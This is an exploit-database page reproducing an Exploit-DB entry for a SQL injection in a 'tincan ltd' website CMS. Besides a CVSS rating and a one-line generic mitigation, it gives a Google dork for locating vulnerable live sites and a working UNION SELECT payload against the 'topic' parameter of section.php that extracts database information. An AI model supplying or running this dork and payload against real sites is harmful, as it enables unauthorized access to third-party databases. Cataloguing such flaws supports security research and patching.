header-logo
Suggest Exploit
vendor:
N/A
by:
altbta
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

tincan ltd (section) SQL Injection Vulnerability

The vulnerability exists in the 'section.php?section=9' page of the website. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious 'topic' parameter containing a SQL injection payload. The payload can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

+/=============================================\+
# [+] Title : tincan ltd (section) SQL Injection Vulnerability
# [+] site s.p : www.tincan.co.uk<http://www.tincan.co.uk>
# [+] Author : altbta
# [+] Email : l_9@HoTMaIL.com
# [+] home : v4-team.com<http://v4-team.com> & tryag.cc
+\=============================================/+

===============================================
DorK : intext:'powered by tincan ltd' and  inurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================
GreeTz To :
  RxH   &    ab0-3th4b   &   sniper site

Navigation

Suggest Exploit

Services By CQR